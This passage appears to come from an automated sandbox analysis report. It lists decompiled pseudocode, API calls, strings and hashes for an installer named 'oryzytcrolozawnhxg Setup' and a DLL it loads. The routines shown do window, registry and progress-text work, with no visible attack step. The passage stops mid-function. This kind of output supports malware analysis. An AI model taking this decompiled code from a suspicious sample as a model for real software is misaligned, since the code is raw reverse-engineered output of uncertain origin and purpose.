                                      							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                      							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                      						}
                                      						if(_t39 != 0) {
                                      							_t28 = _a4;
                                      							 *((char*)(_t28 + 0x4297b0)) = 0;
                                      							return _t28;
                                      						}
                                      					} else {
                                      						_t26 =  &(_a4[lstrlenA(_a8)]);
                                      						if(_t26 < 0x800) {
                                      							_t26 = lstrcatA(0x4297b0, _a8);
                                      							goto L6;
                                      						}
                                      					}
                                      				}
                                      				return _t26;
                                      			}

                                      APIs
                                      • lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                      • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                      • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                      • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                                      				long _v8;
                                      				signed char _v12;
                                      				unsigned int _v16;
                                      				void* _v20;
                                      				intOrPtr _v24;
                                      				long _v56;
                                      				void* _v60;
                                      				long _t15;
                                      				unsigned int _t19;
                                      				signed int _t25;
                                      				struct HWND__* _t28;
                                      
                                      				_t28 = _a4;
                                      				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                      				if(_a8 == 0) {
                                      					L4:
                                      					_v56 = _t15;
                                      					_v60 = 4;
                                      					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                      					return _v24;
                                      				}
                                      				_t19 = GetMessagePos();
                                      				_v16 = _t19 >> 0x10;
                                      				_v20 = _t19;
                                      				ScreenToClient(_t28,  &_v20);
                                      				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                      				if((_v12 & 0x00000066) != 0) {
                                      					_t15 = _v8;
                                      					goto L4;
                                      				}
                                      				return _t25 | 0xffffffff;
                                      			}

                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                                      • GetMessagePos.USER32 ref: 004045BB
                                      • ScreenToClient.USER32 ref: 004045D5
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                      				char _v68;
                                      				int _t11;
                                      				int _t20;
                                      
                                      				if(_a8 == 0x110) {
                                      					SetTimer(_a4, 1, 0xfa, 0);
                                      					_a8 = 0x113;
                                      				}
                                      				if(_a8 == 0x113) {
                                      					_t20 =  *0x414b78; // 0x4dbff
                                      					_t11 =  *0x428b88; // 0x4dc03
                                      					if(_t20 >= _t11) {
                                      						_t20 = _t11;
                                      					}
                                      					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                      					SetWindowTextA(_a4,  &_v68);
                                      					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B7D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 28%
                                      			E10004668() {
                                      				intOrPtr _t41;
                                      				signed int _t46;
                                      				void* _t85;
                                      				void* _t87;
                                      				void* _t90;
                                      
                                      				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x18));
                                      				0x10000000( *((intOrPtr*)(_t85 + 8)), _t41);
                                      				 *((intOrPtr*)(_t85 - 0xf8)) = _t41;
                                      				0x10000000( *((intOrPtr*)(_t85 + 8)));
                                      				0x10000000( *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)(_t85 - 0xf8)));
                                      				_t90 = _t87 + 0x14;
                                      				if(( *(_t85 + 0x14) & 0x00000808) != 0) {
                                      					 *(_t85 - 0x80) = 0;
                                      					_t46 =  *(_t85 + 0x14) & 0x00000800;
                                      					 *(_t85 - 0x84) = _t46;
                                      					if(_t46 == 0) {
                                      						 *(_t85 - 0x84) = 8;
                                      					}
                                      					L1000CDE2();
                                      					 *(_t85 - 0x88) = _t46;
                                      					 *(_t85 - 0x80) = HeapAlloc(GetProcessHeap(), 0,  *(_t85 - 0x88) + 2);
                                      					L1000CDE2();
                                      					 *((short*)( *(_t85 - 0x80) + ( *(_t85 - 0x88) >> 1) * 2)) = 0;
                                      					0x10000000( *((intOrPtr*)(_t85 + 8)), 0,  *(_t85 - 0x80),  *(_t85 - 0x88) >> 1,  *((intOrPtr*)(_t85 - 0xf8)),  *((intOrPtr*)(_t85 - 0x270)),  *(_t85 - 0x84),  *(_t85 - 0x80),  *(_t85 - 0x88),  *((intOrPtr*)(_t85 - 0x270)),  *(_t85 - 0x84), 0, 0);
                                      					_t90 = _t90 + 0x14;
                                      					HeapFree(GetProcessHeap(), 0,  *(_t85 - 0x80));
                                      					if( *(_t85 - 0x84) == 8) {
                                      						0x10000000( *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x4e0)), ( *(_t85 - 0x88) >> 1) +  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x4e0)));
                                      						_t90 = _t90 + 0xc;
                                      					}
                                      				}
                                      				0x10000000( *((intOrPtr*)(_t85 - 0xf8)));
                                      				0x10000000( *((intOrPtr*)(_t85 + 8)));
                                      				0x10000000( *((intOrPtr*)(_t85 + 8)), 0);
                                      				return 0;
                                      			}

                                      APIs
                                      • ImmGetCompositionStringW.IMM32(?,?,00000000,00000000), ref: 100046E2
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 100046F9
                                      • HeapAlloc.KERNEL32(00000000), ref: 10004700
                                      • ImmGetCompositionStringW.IMM32(?,?,00000000,?), ref: 10004722
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 10004760
                                      • HeapFree.KERNEL32(00000000), ref: 10004767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Heap$CompositionProcessString$AllocFree
                                      • String ID:
                                      • API String ID: 3640976095-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OleCreateDefaultHandler.OLE32(1001A494,00000000,1001A4D4,00000000), ref: 10007980
                                      • MulDiv.KERNEL32(00000000,000000FE,00000090), ref: 10007ABA
                                      • MulDiv.KERNEL32(?,000000FE,00000090), ref: 10007AD4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CreateDefaultHandler
                                      • String ID: 8$@
                                      • API String ID: 1257578756-1376636172
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E10002FA9() {
                                      				intOrPtr _t93;
                                      				void* _t98;
                                      				short* _t105;
                                      				intOrPtr _t109;
                                      				void* _t149;
                                      				void* _t151;
                                      				void* _t153;
                                      				void* _t155;
                                      
                                      				 *(_t149 - 0xa0) =  *( *(_t149 + 0x14)) & 0x0000ffff;
                                      				 *(_t149 - 0x14) =  *(_t149 - 0xa0);
                                      				 *(_t149 - 0x4c) =  *(_t149 + 0x14);
                                      				 *(_t149 - 0x198) = 0;
                                      				if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
                                      					 *(_t149 - 0x17c) = "Ansi";
                                      				} else {
                                      					 *(_t149 - 0x17c) = "Unicode";
                                      				}
                                      				0x10000000("EM_GETLINE: row=%d, nMaxChars=%d (%s)\n",  *((intOrPtr*)(_t149 + 0x10)),  *(_t149 - 0xa0),  *(_t149 - 0x17c));
                                      				_t93 =  *((intOrPtr*)(_t149 + 0x10));
                                      				0x10000000( *((intOrPtr*)(_t149 + 8)), _t93);
                                      				_t153 = _t151 + 0x18;
                                      				 *((intOrPtr*)(_t149 - 0x9c)) = _t93;
                                      				if( *((intOrPtr*)(_t149 - 0x9c)) != 0) {
                                      					0x10000000( *((intOrPtr*)(_t149 - 0x9c)), _t149 - 0x2d0);
                                      					0x10000000( *((intOrPtr*)(_t149 - 0x9c)), _t149 - 0x2dc, 1);
                                      					_t155 = _t153 + 0x14;
                                      					 *((intOrPtr*)(_t149 - 0x34)) =  *((intOrPtr*)(_t149 - 0x2cc));
                                      					while( *(_t149 - 0x14) != 0) {
                                      						if( *((intOrPtr*)(_t149 - 0x34)) !=  *((intOrPtr*)(_t149 - 0x2cc))) {
                                      							 *(_t149 - 0x180) = 0;
                                      						} else {
                                      							 *(_t149 - 0x180) =  *(_t149 - 0x2c8);
                                      						}
                                      						 *(_t149 - 0x264) =  *(_t149 - 0x180);
                                      						if( *((intOrPtr*)(_t149 - 0x34)) !=  *((intOrPtr*)(_t149 - 0x2d8))) {
                                      							 *(_t149 - 0x184) =  *( *((intOrPtr*)(_t149 - 0x34)) + 0xc);
                                      						} else {
                                      							 *(_t149 - 0x184) =  *(_t149 - 0x2d4);
                                      						}
                                      						 *(_t149 - 0x188) =  *(_t149 - 0x184);
                                      						_t105 = E10001000( *((intOrPtr*)(_t149 - 0x34)),  *(_t149 - 0x264));
                                      						_t155 = _t155 + 8;
                                      						 *(_t149 - 0x190) = _t105;
                                      						if( *(_t149 - 0x14) >=  *(_t149 - 0x188)) {
                                      							 *(_t149 - 0x18c) =  *(_t149 - 0x188);
                                      						} else {
                                      							 *(_t149 - 0x18c) =  *(_t149 - 0x14);
                                      						}
                                      						 *(_t149 - 0x7c) =  *(_t149 - 0x18c);
                                      						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
                                      							 *(_t149 - 0x7c) = WideCharToMultiByte(0, 0,  *(_t149 - 0x190),  *(_t149 - 0x7c),  *(_t149 - 0x4c),  *(_t149 - 0x14), 0, 0);
                                      						} else {
                                      							E1000F6E0( *(_t149 - 0x4c),  *(_t149 - 0x190),  *(_t149 - 0x7c) << 1);
                                      							_t155 = _t155 + 0xc;
                                      						}
                                      						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
                                      							 *(_t149 - 0x194) = 1;
                                      						} else {
                                      							 *(_t149 - 0x194) = 2;
                                      						}
                                      						 *(_t149 - 0x4c) =  *(_t149 - 0x4c) +  *(_t149 - 0x7c) *  *(_t149 - 0x194);
                                      						 *(_t149 - 0x14) =  *(_t149 - 0x14) -  *(_t149 - 0x7c);
                                      						_t109 =  *((intOrPtr*)(_t149 - 0x34));
                                      						if(_t109 !=  *((intOrPtr*)(_t149 - 0x2d8))) {
                                      							0x10000000( *((intOrPtr*)(_t149 - 0x9c)),  *((intOrPtr*)(_t149 - 0x34)));
                                      							_t155 = _t155 + 8;
                                      							 *((intOrPtr*)(_t149 - 0x34)) = _t109;
                                      							continue;
                                      						} else {
                                      						}
                                      						break;
                                      					}
                                      					if( *(_t149 - 0x14) > 0) {
                                      						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
                                      							 *( *(_t149 - 0x4c)) = 0;
                                      						} else {
                                      							 *( *(_t149 - 0x4c)) = 0;
                                      						}
                                      						 *(_t149 - 0x14) =  *(_t149 - 0x14) - 1;
                                      						 *(_t149 - 0x198) = 1;
                                      					}
                                      					0x10000000("EM_GETLINE: got %u characters\n",  *(_t149 - 0xa0) -  *(_t149 - 0x14));
                                      					if( *(_t149 - 0x198) == 0) {
                                      						 *(_t149 - 0x19c) = 0;
                                      					} else {
                                      						 *(_t149 - 0x19c) = 1;
                                      					}
                                      					_t98 =  *(_t149 - 0xa0) -  *(_t149 - 0x14) -  *(_t149 - 0x19c);
                                      				} else {
                                      					_t98 = 0;
                                      				}
                                      				return _t98;
                                      			}

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 10003150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: Ansi$EM_GETLINE: got %u characters$EM_GETLINE: row=%d, nMaxChars=%d (%s)$Unicode
                                      • API String ID: 626452242-2053147572
                                      • Opcode ID: 1c981d310823cc8dc6c551e4769e2d1440a88619568040abbe26955304cdb8ee
                                      • Instruction ID: 698bad97488f1ed7258124122135d4fccc31c92632c1560c3141a7a3769bf058
                                      • Opcode Fuzzy Hash: 1c981d310823cc8dc6c551e4769e2d1440a88619568040abbe26955304cdb8ee
                                      • Instruction Fuzzy Hash: 178135B4D04219DFEB25CF94D995BEEB7B5FB48340F208199E909A7245DB306E80CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040373D(void* __ecx, void* __eflags) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed short _t6;
                                      				intOrPtr _t11;
                                      				signed int _t13;
                                      				intOrPtr _t15;
                                      				signed int _t16;
                                      				signed short* _t18;
                                      				signed int _t20;
                                      				signed short* _t23;
                                      				intOrPtr _t25;
                                      				signed int _t26;
                                      				intOrPtr* _t27;
                                      
                                      				_t24 = "1033";
                                      				_t13 = 0xffff;
                                      				_t6 = E004058A2(__ecx, "1033");
                                      				while(1) {
                                      					_t26 =  *0x42eba4; // 0x1
                                      					if(_t26 == 0) {
                                      						goto L7;
                                      					}
                                      					_t15 =  *0x42eb70; // 0x720250
                                      					_t16 =  *(_t15 + 0x64);
                                      					_t20 =  ~_t16;
                                      					_t18 = _t16 * _t26 +  *0x42eba0;
                                      					while(1) {
                                      						_t18 = _t18 + _t20;
                                      						_t26 = _t26 - 1;
                                      						if((( *_t18 ^ _t6) & _t13) == 0) {
                                      							break;
                                      						}
                                      						if(_t26 != 0) {
                                      							continue;
                                      						}
                                      						goto L7;
                                      					}
                                      					 *0x42e340 = _t18[1];
                                      					 *0x42ec08 = _t18[3];
                                      					_t23 =  &(_t18[5]);
                                      					if(_t23 != 0) {
                                      						 *0x42e33c = _t23;
                                      						E00405889(_t24,  *_t18 & 0x0000ffff);
                                      						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "oryzytcrolozawnhxg Setup", 0xfffffffe));
                                      						_t11 =  *0x42eb8c; // 0x4
                                      						_t27 =  *0x42eb88; // 0x7203fc
                                      						if(_t11 == 0) {
                                      							L15:
                                      							return _t11;
                                      						}
                                      						_t25 = _t11;
                                      						do {
                                      							_t11 =  *_t27;
                                      							if(_t11 != 0) {
                                      								_t5 = _t27 + 0x18; // 0x720414
                                      								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                                      							}
                                      							_t27 = _t27 + 0x418;
                                      							_t25 = _t25 - 1;
                                      						} while (_t25 != 0);
                                      						goto L15;
                                      					}
                                      					L7:
                                      					if(_t13 != 0xffff) {
                                      						_t13 = 0;
                                      					} else {
                                      						_t13 = 0x3ff;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • SetWindowTextA.USER32(00000000,oryzytcrolozawnhxg Setup), ref: 004037D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\$oryzytcrolozawnhxg Setup$xr
                                      • API String ID: 530164218-2657488401
                                      • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                      • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                      • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                      • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E004022F5(void* __eax) {
                                      				void* _t15;
                                      				char* _t18;
                                      				int _t19;
                                      				char _t24;
                                      				int _t27;
                                      				signed int _t30;
                                      				intOrPtr _t35;
                                      				void* _t37;
                                      
                                      				_t15 = E00402ADD(__eax);
                                      				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                      				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                      				 *(_t37 - 0x44) = E004029E8(2);
                                      				_t18 = E004029E8(0x11);
                                      				_t30 =  *0x42ec10; // 0x0
                                      				 *(_t37 - 4) = 1;
                                      				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                      				if(_t19 == 0) {
                                      					if(_t35 == 1) {
                                      						E004029E8(0x23);
                                      						_t19 = lstrlenA(0x40a378) + 1;
                                      					}
                                      					if(_t35 == 4) {
                                      						_t24 = E004029CB(3);
                                      						 *0x40a378 = _t24;
                                      						_t19 = _t35;
                                      					}
                                      					if(_t35 == 3) {
                                      						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                                      					}
                                      					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                                      						 *(_t37 - 4) = _t27;
                                      					}
                                      					_push( *(_t37 + 8));
                                      					RegCloseKey();
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
                                      				return 0;
                                      			}

                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj1052.tmp
                                      • API String ID: 1356686001-1688940567
                                      • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                      • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                      • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                      • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00402A28(void* _a4, char* _a8, long _a12) {
                                      				void* _v8;
                                      				char _v272;
                                      				signed char _t16;
                                      				long _t18;
                                      				long _t25;
                                      				intOrPtr* _t27;
                                      				long _t28;
                                      
                                      				_t16 =  *0x42ec10; // 0x0
                                      				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                      				if(_t18 == 0) {
                                      					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                      						__eflags = _a12;
                                      						if(_a12 != 0) {
                                      							RegCloseKey(_v8);
                                      							L8:
                                      							__eflags = 1;
                                      							return 1;
                                      						}
                                      						_t25 = E00402A28(_v8,  &_v272, 0);
                                      						__eflags = _t25;
                                      						if(_t25 != 0) {
                                      							break;
                                      						}
                                      					}
                                      					RegCloseKey(_v8);
                                      					_t27 = E00405C49(2);
                                      					if(_t27 == 0) {
                                      						__eflags =  *0x42ec10; // 0x0
                                      						if(__eflags != 0) {
                                      							goto L8;
                                      						}
                                      						_t28 = RegDeleteKeyA(_a4, _a8);
                                      						__eflags = _t28;
                                      						if(_t28 != 0) {
                                      							goto L8;
                                      						}
                                      						return _t28;
                                      					}
                                      					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                                      				}
                                      				return _t18;
                                      			}











                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                      • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                      • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                      • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00401CC1(int __edx) {
                                      				void* _t17;
                                      				struct HINSTANCE__* _t21;
                                      				struct HWND__* _t25;
                                      				void* _t27;
                                      
                                      				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                      				GetClientRect(_t25, _t27 - 0x40);
                                      				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                      				if(_t17 != _t21) {
                                      					DeleteObject(_t17);
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                                      				return 0;
                                      			}








                                      APIs
                                      • GetDlgItem.USER32 ref: 00401CC5
                                      • GetClientRect.USER32 ref: 00401CD2
                                      • LoadImageA.USER32 ref: 00401CF3
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                      • DeleteObject.GDI32(00000000), ref: 00401D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                      • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                      • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                      • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                                      				char _v36;
                                      				char _v68;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
